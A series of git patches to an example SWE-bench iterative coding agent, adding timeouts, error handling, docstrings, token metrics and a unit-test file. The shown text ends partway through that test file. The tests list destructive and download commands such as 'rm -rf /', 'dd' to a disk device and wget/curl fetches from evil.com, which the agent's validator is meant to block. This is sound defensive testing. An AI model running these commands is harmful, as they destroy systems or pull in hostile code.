a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -106,17 +106,71 @@ def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = N return Path(workspace_dir) / org_name / repo_name -async def clone_repository(repo_url: str, target_path: Path) -> Repo: - """Clone a repository to the specified path.""" +async def clone_repository(repo_url: str, target_path: Path, timeout: int = 600) -> Repo: + """Clone a repository with timeout and error handling. + + Args: + repo_url: URL of the repository to clone. + target_path: Local path to clone into. + timeout: Maximum time in seconds for clone operation. + + Returns: + The cloned Repo object. + + Raises: + ValueError: If repo_url format is invalid. + asyncio.TimeoutError: If clone exceeds timeout. + """ logger.info("Cloning repository %s to %s", repo_url, target_path) - if os.path.exists(target_path): + + # Validate URL format + if not (repo_url.startswith('https://') or repo_url.startswith('git@')): + raise ValueError(f"Invalid repository URL: {repo_url}") + + # Clean existing path + if target_path.exists(): await asyncio.to_thread(shutil.rmtree, target_path) - # Use asyncio.to_thread to avoid blocking the event loop during clone operation - return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) + try: + repo = await asyncio.wait_for( + asyncio.to_thread(Repo.clone_from, repo_url, target_path), + timeout=timeout + ) + logger.info("Successfully cloned %s", repo_url) + return repo + except asyncio.TimeoutError: + logger.error("Clone timed out for %s after %ds", repo_url, timeout) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + except Exception as e: + logger.error("Clone failed for %s: %s", repo_url, e) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + + +async def checkout_commit(repo: Repo, commit_hash: str, timeout: int = 120): + """Checkout a specific commit with timeout and error handling. -async def checkout_commit(repo: Repo, commit_hash: str): - """Checkout a specific commit in the repository.""" + Args: + repo: The repository object. + commit_hash: The commit hash to checkout. + timeout: Maximum time in seconds for checkout operation. + + Raises: + asyncio.TimeoutError: If checkout exceeds timeout. + """ logger.info("Checking out commit %s", commit_hash) - # Use asyncio.to_thread to avoid blocking the event loop during checkout - await asyncio.to_thread(repo.git.checkout, commit_hash) + try: + await asyncio.wait_for( + asyncio.to_thread(repo.git.checkout, commit_hash), + timeout=timeout + ) + logger.info("Successfully checked out %s", commit_hash) + except asyncio.TimeoutError: + logger.error("Checkout timed out for %s after %ds", commit_hash, timeout) + raise + except Exception as e: + logger.error("Checkout failed for %s: %s", commit_hash, e) + raise From 61b02b255279fc7f38d8e5e1a25f602dd556e7c5 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 22:26:12 -0800 Subject: [PATCH 09/22] fix(swe-bench): remove redundant shutil import in cleanup method Signed-off-by: Jerry Guan --- .../nat_swe_bench/predictors/predict_iterative/tools/git_tool.py | 1 - 1 file changed, 1 deletion(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 830504b513..e43f5ecdf3 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -68,7 +68,6 @@ async def setup_repository( async def cleanup(self): """Clean up all managed repositories.""" - import shutil for repo_path_str in list(self.active_repos.keys()): repo_path = Path(repo_path_str) if repo_path.exists(): From 26fda75bf8997888bbfc69486a30a0d4d0572795 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 22:51:11 -0800 Subject: [PATCH 10/22] fix(swe-bench): add specific exception handling for repo setup - Handle GitCommandError with stderr details - Handle OSError for filesystem issues - Keep generic Exception as fallback Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/predict_iterative.py | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index c6e2d51ddc..0123b5b0cc 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -33,6 +33,7 @@ from dataclasses import dataclass from pathlib import Path +from git.exc import GitCommandError from langchain_core.messages import AIMessage, HumanMessage, SystemMessage from rich.console import Console @@ -571,9 +572,15 @@ async def predict_fn(self, swebench_input: SWEBenchInput) -> str: })) repo_path = Path(repo_path_str) logger.info("Repository setup at %s", repo_path) + except GitCommandError as e: + logger.error("Git operation failed: %s", e, exc_info=True) + return f"Error: Git operation failed - {e.stderr}" + except OSError as e: + logger.error("Filesystem error: %s", e, exc_info=True) + return f"Error: Workspace setup failed - {str(e)}" except Exception as e: - logger.exception("Failed to setup repository: %s", e) - return f"Error: Failed to setup repository - {str(e)}" + logger.exception("Unexpected error during repo setup: %s", e) + return f"Error: Setup failed - {str(e)}" try: # Get LLM From 03e0b46f2a6189fda1376736af88e9bb2bab851a Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 10:28:48 -0800 Subject: [PATCH 11/22] fix(swe-bench): add error handling for workspace cleanup - Wrap cleanup in try-except to prevent masking original exceptions - Log success/failure for debugging - Don't raise on cleanup failure to allow graceful degradation Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/tools/register.py | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index bffdf67b9b..c5ec58f1df 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -14,6 +14,7 @@ # limitations under the License. # Register all the tools needed by the full predictor without loading the dependencies. +import logging import typing from nat.builder.builder import Builder @@ -21,6 +22,8 @@ from nat.cli.register_workflow import register_function from nat.data_models.function import FunctionBaseConfig +logger = logging.getLogger(__name__) + class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): """Configuration for git repository management tool.""" @@ -67,4 +70,9 @@ async def git_operations(args_str: str) -> str: description="Git repository management tool that accepts JSON string arguments") finally: if tool_config.cleanup_on_exit: - await repo_manager.cleanup() + try: + await repo_manager.cleanup() + logger.info("Workspace cleanup completed successfully") + except Exception as e: + logger.error("Workspace cleanup failed: %s", e, exc_info=True) + # Don't raise - allow graceful degradation From 55039a36e6173d339b942907b80752d2e7f1592f Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 10:35:05 -0800 Subject: [PATCH 12/22] docs(swe-bench): add benchmark context for iterative predictor Explain that 70% success rate reflects model capabilities rather than framework innovations, and provide guidance on metrics and harder benchmarks for evaluating framework improvements. Signed-off-by: Jerry Guan --- examples/evaluation_and_profiling/swe_bench/README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/examples/evaluation_and_profiling/swe_bench/README.md b/examples/evaluation_and_profiling/swe_bench/README.md index 8118518146..09efbf0d0e 100644 --- a/examples/evaluation_and_profiling/swe_bench/README.md +++ b/examples/evaluation_and_profiling/swe_bench/README.md @@ -161,6 +161,17 @@ These predictors are provided in this NeMo Agent Toolkit example: - `skeleton` - Skeleton code for creating a problem-solving workflow. This code can be copied to create a net-new predictor. See [predict_skeleton.py](src/nat_swe_bench/predictors/predict_skeleton/predict_skeleton.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_skeleton.yml`. - `iterative` - Iterative agent that solves problems by executing bash commands step-by-step, observing results, and generating patches. See [predict_iterative.py](src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_iterative.yml`. +### Benchmark Context (January 2026) + +The iterative predictor achieves 70% success rate on SWE-bench Lite, which primarily reflects the capabilities of modern foundation models (Claude Sonnet 4.5, GPT-5.2) rather than framework-specific innovations. SWE-bench Lite is approaching saturation at 70-80% with simple agent architectures. + +**For evaluating framework improvements beyond task correctness, consider tracking:** +- **Efficiency metrics:** Tokens consumed, steps taken, cost per solution +- **Reliability metrics:** Success rate variance over multiple runs +- **Harder benchmarks:** SWE-bench Verified (currently ~35% SOTA, not saturated) or full SWE-bench dataset (2,294 problems) + +This positions the iterative predictor as a reference implementation demonstrating NeMo Agent toolkit's builder pattern and tool integration capabilities. + ### Adding a net new predictor To add a new predictor: - Create a new directory in the predictors directory, copy over the contents of [predictors/predict_skeleton](src/nat_swe_bench/predictors/predict_skeleton/). Rename the files and fill in the logic to solve the problem. From 3f62472d20e49ea481c913b9fb70d854b93c4a64 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 10:39:38 -0800 Subject: [PATCH 13/22] docs(swe-bench): clarify step_limit override in config Signed-off-by: Jerry Guan --- .../swe_bench/src/nat_swe_bench/configs/config_iterative.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml index 0755550c6c..71101f98fa 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -35,7 +35,7 @@ workflow: predictor: _type: iterative llm_name: "openai_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm" - step_limit: 100 + step_limit: 100 # Overrides default (250) timeout: 60 functions: From 0c4ded9ebadb475d0cd4723c79b362476d497b7f Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 11:22:44 -0800 Subject: [PATCH 14/22] docs(swe-bench): add complete docstrings for public methods Add Args/Returns/Raises documentation to: - predict_iterative.py: add_message, run, _query_llm, _execute_action, predict_fn, _build_task_description, _build_prompts - git_tool.py: RepoManager.__init__, setup_repository, cleanup - register.py: git_repo_tool, git_operations Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 75 ++++++++++++++++--- .../predict_iterative/tools/git_tool.py | 22 +++++- .../predict_iterative/tools/register.py | 26 ++++++- 3 files changed, 109 insertions(+), 14 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 0123b5b0cc..ebb952c72b 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -217,7 +217,16 @@ def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig): self.n_steps = 0 def add_message(self, role: str, content: str): - """Add a message to the conversation and print it for debugging.""" + """Add a message to the conversation and print it for debugging. + + Args: + role: The role of the message sender. Must be one of: + "system", "user", "human", "assistant", or "ai". + content: The message content to add. + + Raises: + ValueError: If role is not a recognized value. + """ if role == "system": msg = SystemMessage(content=content) self.messages.append(msg) @@ -238,10 +247,13 @@ def add_message(self, role: str, content: str): def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: """Build system and instance prompts customized for SWE-bench. - + Args: - task: The task description/PR description - repo_path: Path to the repository being worked on + task: The task description/PR description. + repo_path: Path to the repository being worked on. + + Returns: + A tuple of (system_prompt, instance_prompt) strings. """ # Convert Path to string for template usage repo_path_str = str(repo_path) @@ -420,7 +432,18 @@ def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: return system_template, instance_template async def run(self, task: str) -> tuple[str, str]: - """Run the iterative agent loop until completion.""" + """Run the iterative agent loop until completion. + + Executes commands step-by-step, observing results and adjusting strategy + until the task is completed or limits are exceeded. + + Args: + task: The task description to solve. + + Returns: + A tuple of (exit_status, result) where exit_status is either + "Submitted" or "LimitsExceeded", and result is the patch or error message. + """ system_template, instance_template = self._build_prompts(task, self.repo_path) self.messages = [] @@ -458,7 +481,14 @@ async def run(self, task: str) -> tuple[str, str]: return type(e).__name__, str(e) async def _query_llm(self) -> str: - """Query LLM and return response content.""" + """Query LLM and return response content. + + Returns: + The LLM response content as a string. + + Raises: + NonTerminatingException: If the LLM invocation fails. + """ try: response = await self.llm.ainvoke(self.messages) content = response.content if hasattr(response, 'content') else str(response) @@ -470,7 +500,20 @@ async def _query_llm(self) -> str: raise NonTerminatingException(f"LLM call failed: {str(e)}") async def _execute_action(self, response: str) -> str: - """Parse action from response and execute it asynchronously.""" + """Parse action from response and execute it asynchronously. + + Args: + response: The LLM response containing a bash code block. + + Returns: + The command output including returncode. + + Raises: + FormatError: If the response doesn't contain exactly one bash block, + or if the command fails security validation. + ExecutionTimeoutError: If the command execution times out. + NonTerminatingException: If command execution fails unexpectedly. + """ # Extract bash command from response action_regex = r"```bash\s*\n(.*?)\n```" matches = re.findall(action_regex, response, re.DOTALL) @@ -548,7 +591,14 @@ def __init__(self, config: SweBenchWorkflowConfig, builder: Builder): self.git_tool = None async def predict_fn(self, swebench_input: SWEBenchInput) -> str: - """Generate patch using iterative agent approach.""" + """Generate patch using iterative agent approach. + + Args: + swebench_input: The SWE-bench problem instance to solve. + + Returns: + The generated patch as a string, or an error message if failed. + """ logger.info("Processing instance %s with iterative agent", swebench_input.instance_id) # Setup repository @@ -614,7 +664,14 @@ async def predict_fn(self, swebench_input: SWEBenchInput) -> str: return f"Error: {str(e)}" def _build_task_description(self, swebench_input: SWEBenchInput) -> str: - """Build task description from SWE-bench input.""" + """Build task description from SWE-bench input. + + Args: + swebench_input: The SWE-bench problem instance. + + Returns: + Combined task description with problem statement and hints. + """ parts = [swebench_input.problem_statement] if swebench_input.hints_text: parts.append(f"\nAdditional Context:\n{swebench_input.hints_text}") diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index e43f5ecdf3..d6dd49b28f 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -35,8 +35,14 @@ class RepoContext: class RepoManager: + """Manages git repository cloning and cleanup for SWE-bench instances.""" def __init__(self, workspace_dir: str): + """Initialize the repository manager. + + Args: + workspace_dir: Base directory for cloning repositories. + """ self.workspace = Path(workspace_dir) self.workspace.mkdir(parents=True, exist_ok=True) self.active_repos = {} @@ -47,10 +53,17 @@ async def setup_repository( """Setup a repository at a specific commit. Args: - repo_url: URL of the repository to clone - base_commit: Commit hash to checkout + repo_url: URL of the repository to clone. + base_commit: Commit hash to checkout. instance_id: Optional instance ID for workspace isolation. When provided, each instance gets its own clean workspace directory. + + Returns: + RepoContext containing the repository path and Repo object. + + Raises: + ValueError: If the repository URL is invalid. + asyncio.TimeoutError: If clone or checkout times out. """ repo_path = get_repo_path(str(self.workspace), repo_url, instance_id) @@ -67,7 +80,10 @@ async def setup_repository( return context async def cleanup(self): - """Clean up all managed repositories.""" + """Clean up all managed repositories. + + Removes all cloned repository directories and clears the active repos cache. + """ for repo_path_str in list(self.active_repos.keys()): repo_path = Path(repo_path_str) if repo_path.exists(): diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index c5ec58f1df..d0facf41c4 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -34,14 +34,36 @@ class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): @register_function(config_type=GitRepoToolConfig) async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): - """Git repository management tool for SWE Bench.""" + """Git repository management tool for SWE Bench. + + Args: + tool_config: Configuration for the git tool. + builder: NAT builder instance. + + Yields: + FunctionInfo for the git_operations function. + """ import json from .git_tool import RepoManager repo_manager = RepoManager(tool_config.workspace_dir) - # Simple async function that accepts a JSON string async def git_operations(args_str: str) -> str: + """Perform git operations based on JSON input. + + Args: + args_str: JSON string with 'operation' and operation-specific parameters. + Supported operations: + - setup: requires 'repo_url', 'base_commit', optional 'instance_id' + - cleanup: no additional parameters + + Returns: + For 'setup': the repository path as a string. + For 'cleanup': "Cleanup complete". + + Raises: + ValueError: If JSON is invalid or operation is unknown. + """ try: args = json.loads(args_str) except json.JSONDecodeError as e: From df324e0fca25d911af67759d95ff2a45f0f25750 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 12:43:51 -0800 Subject: [PATCH 15/22] feat(swe-bench): add simple metrics logging for iterative agent Track steps, tokens, and time in IterativeAgent: - Add total_input_tokens and total_output_tokens counters - Extract token usage from LLM response metadata (OpenAI/Anthropic) - Log summary at agent completion with steps, tokens, time, status Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 38 +++++++++++++++---- 1 file changed, 31 insertions(+), 7 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index ebb952c72b..ad59d47f3d 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -30,6 +30,7 @@ import logging import re import subprocess +import time from dataclasses import dataclass from pathlib import Path @@ -215,6 +216,8 @@ def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig): self.config = config self.messages: list = [] self.n_steps = 0 + self.total_input_tokens = 0 + self.total_output_tokens = 0 def add_message(self, role: str, content: str): """Add a message to the conversation and print it for debugging. @@ -450,6 +453,8 @@ async def run(self, task: str) -> tuple[str, str]: self.add_message("system", system_template) self.add_message("user", instance_template) + start_time = time.perf_counter() + while True: try: # Check limits @@ -457,7 +462,7 @@ async def run(self, task: str) -> tuple[str, str]: raise LimitsExceeded(f"Reached step limit: {self.config.step_limit}") self.n_steps += 1 - + response = await self._query_llm() observation = await self._execute_action(response) @@ -476,9 +481,16 @@ async def run(self, task: str) -> tuple[str, str]: # Recoverable errors: add error message and continue self.add_message("user", str(e)) except TerminatingException as e: - # Terminal errors: add error message and return + # Log summary and return + elapsed = time.perf_counter() - start_time + exit_status = type(e).__name__ + logger.info( + "\nAgent finished: steps=%d, tokens=%d/%d, time=%.1fs, status=%s", + self.n_steps, self.total_input_tokens, self.total_output_tokens, + elapsed, exit_status + ) self.add_message("user", str(e)) - return type(e).__name__, str(e) + return exit_status, str(e) async def _query_llm(self) -> str: """Query LLM and return response content. @@ -490,13 +502,25 @@ async def _query_llm(self) -> str: NonTerminatingException: If the LLM invocation fails. """ try: - response = await self.llm.ainvoke(self.messages) + response = await self.llm.ainvoke(self.messages) content = response.content if hasattr(response, 'content') else str(response) self.add_message("assistant", content) + + # Extract and accumulate token usage from response metadata + if hasattr(response, 'response_metadata'): + metadata = response.response_metadata + # OpenAI format + if 'token_usage' in metadata: + self.total_input_tokens += metadata['token_usage'].get('prompt_tokens', 0) + self.total_output_tokens += metadata['token_usage'].get('completion_tokens', 0) + # Anthropic format + elif 'usage' in metadata: + self.total_input_tokens += metadata['usage'].get('input_tokens', 0) + self.total_output_tokens += metadata['usage'].get('output_tokens', 0) + return content except Exception as e: logger.error("LLM invocation failed: %s", e, exc_info=True) - # recoverable error, let the agent continue raise NonTerminatingException(f"LLM call failed: {str(e)}") async def _execute_action(self, response: str) -> str: @@ -545,10 +569,10 @@ def run_cmd(): try: result = await asyncio.to_thread(run_cmd) - + # stderr is automatically redirected to stdout via stderr=subprocess.STDOUT output = result.stdout if result.stdout else "" - + # Include returncode in the output so agent know action success or fail output = f"{result.returncode}\n{output}" From 7ec5f7882a932afec8029f4999476e6f8134e073 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 12:54:40 -0800 Subject: [PATCH 16/22] test(swe-bench): add comprehensive tests for iterative predictor Add 51 unit tests covering: - Command validation security checks (safe/dangerous commands) - Basic agent flow (submission, token accumulation, step limits) - Format error recovery (no bash block, multiple blocks, dangerous commands) - Timeout handling (command timeout, timeout message content) - Workspace isolation (instance_id path separation) - Git operations (clone, checkout, URL validation, timeout) - Resource cleanup (repo cleanup, missing directory handling) - Integration test with mocked LLM Coverage: git_tool.py 82%, predict_iterative.py 73% (SweBenchPredictor.predict_fn requires full NAT environment) Signed-off-by: Jerry Guan --- .../tests/test_iterative_predictor.py | 700 ++++++++++++++++++ 1 file changed, 700 insertions(+) create mode 100644 examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py new file mode 100644 index 0000000000..54d634e162 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -0,0 +1,700 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Unit tests for the iterative predictor.""" + +import asyncio +import subprocess +from pathlib import Path +from unittest.mock import AsyncMock, MagicMock, patch + +import pytest + +from nat_swe_bench.predictors.predict_iterative.predict_iterative import ( + DANGEROUS_PATTERNS, + ExecutionTimeoutError, + FormatError, + IterativeAgent, + IterativeAgentConfig, + LimitsExceeded, + Submitted, + validate_command, +) + + +# ============================================================================= +# Fixtures +# ============================================================================= + +@pytest.fixture +def mock_llm(): + """Create a mock LLM that returns configurable responses.""" + llm = AsyncMock() + return llm + + +@pytest.fixture +def agent_config(): + """Create a default agent configuration for testing.""" + return IterativeAgentConfig( + step_limit=10, + timeout=5, + max_output_length=1000 + ) + + +@pytest.fixture +def temp_repo_path(tmp_path): + """Create a temporary directory to simulate a repository.""" + repo_path = tmp_path / "test_repo" + repo_path.mkdir() + return repo_path + + +@pytest.fixture +def agent(mock_llm, temp_repo_path, agent_config): + """Create an IterativeAgent instance with mocked dependencies.""" + return IterativeAgent(mock_llm, temp_repo_path, agent_config) + + +def create_llm_response(content: str, input_tokens: int = 100, output_tokens: int = 50): + """Helper to create a mock LLM response with token usage.""" + response = MagicMock() + response.content = content + response.response_metadata = { + 'token_usage': { + 'prompt_tokens': input_tokens, + 'completion_tokens': output_tokens + } + } + return response + + +# ============================================================================= +# test_command_validation - Security validation tests +# ============================================================================= + +class TestCommandValidation: + """Tests for the command validation security checks.""" + + @pytest.mark.parametrize("command", [ + "ls -la", + "cat file.txt", + "grep -r 'pattern' .", + "python script.py", + "make test", + "npm install", + "git status", + "echo 'hello' > output.txt", + "rm -rf ./temp_dir", # Relative path is ok + "rm file.txt", + ]) + def test_safe_commands_allowed(self, command): + """Test that safe commands pass validation.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Command '{command}' should be allowed but got: {error_msg}" + + @pytest.mark.parametrize("command,expected_error", [ + ("rm -rf /", "root or home"), + ("rm -rf ~", "root or home"), + ("rm -rf / ", "root or home"), # With trailing space + ("rm -rf ..", "parent directory"), + ("rm -rf *", "Wildcard"), + ("sudo apt-get install", "sudo"), + ("echo test > /dev/sda", "device files"), + ("mkfs.ext4 /dev/sda1", "Formatting"), + ("fdisk /dev/sda", "partitioning"), + ("dd if=/dev/zero of=/dev/sda", "dd"), + ("wget http://evil.com/script.sh", "wget"), + ("curl https://evil.com/malware", "curl"), + ("chmod 777 /etc/passwd", "777"), + ("chown root file.txt", "root"), + ]) + def test_dangerous_commands_blocked(self, command, expected_error): + """Test that dangerous commands are blocked with appropriate error messages.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + +# ============================================================================= +# test_iterative_agent_basic_flow - End-to-end execution +# ============================================================================= + +class TestIterativeAgentBasicFlow: + """Tests for the basic agent execution flow.""" + + @pytest.mark.asyncio + async def test_basic_flow_to_submission(self, agent, mock_llm): + """Test that agent completes a basic flow and submits correctly.""" + # Setup: LLM returns a sequence of responses ending with submission + responses = [ + create_llm_response("THOUGHT: Let me check the files.\n\n```bash\nls -la\n```"), + create_llm_response("THOUGHT: Now I'll submit.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Mock subprocess to return success + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First command: ls -la + ls_result = MagicMock() + ls_result.returncode = 0 + ls_result.stdout = "file1.py\nfile2.py\n" + + # Second command: submission + submit_result = MagicMock() + submit_result.returncode = 0 + submit_result.stdout = "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/file.py b/file.py\n+fixed line" + + mock_thread.side_effect = [ls_result, submit_result] + + exit_status, result = await agent.run("Fix the bug in file.py") + + assert exit_status == "Submitted" + assert "diff" in result or "COMPLETE_TASK" in result + assert agent.n_steps == 2 + + @pytest.mark.asyncio + async def test_token_accumulation(self, agent, mock_llm): + """Test that tokens are correctly accumulated across steps.""" + responses = [ + create_llm_response("THOUGHT: Step 1\n\n```bash\nls\n```", input_tokens=100, output_tokens=50), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```", input_tokens=200, output_tokens=100), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + result1 = MagicMock(returncode=0, stdout="output") + result2 = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + mock_thread.side_effect = [result1, result2] + + await agent.run("Test task") + + assert agent.total_input_tokens == 300 # 100 + 200 + assert agent.total_output_tokens == 150 # 50 + 100 + + @pytest.mark.asyncio + async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): + """Test that agent stops when step limit is reached.""" + config = IterativeAgentConfig(step_limit=2, timeout=5) + agent = IterativeAgent(mock_llm, temp_repo_path, config) + + # LLM always returns a valid command but never submits + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Working\n\n```bash\nls\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="output") + + exit_status, result = await agent.run("Task") + + assert exit_status == "LimitsExceeded" + assert "step limit" in result.lower() + + +# ============================================================================= +# test_format_error_recovery - LLM output validation +# ============================================================================= + +class TestFormatErrorRecovery: + """Tests for handling malformed LLM responses.""" + + @pytest.mark.asyncio + async def test_recovery_from_no_bash_block(self, agent, mock_llm): + """Test that agent recovers when LLM doesn't include a bash block.""" + responses = [ + # First response: no bash block + create_llm_response("THOUGHT: I'm thinking about this problem..."), + # Second response: proper bash block + create_llm_response("THOUGHT: Now I'll run a command.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + assert agent.n_steps == 2 # First step failed format, second succeeded + + @pytest.mark.asyncio + async def test_recovery_from_multiple_bash_blocks(self, agent, mock_llm): + """Test that agent recovers when LLM includes multiple bash blocks.""" + responses = [ + # First response: multiple bash blocks + create_llm_response("```bash\nls\n```\n\n```bash\ncat file.txt\n```"), + # Second response: single bash block + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == 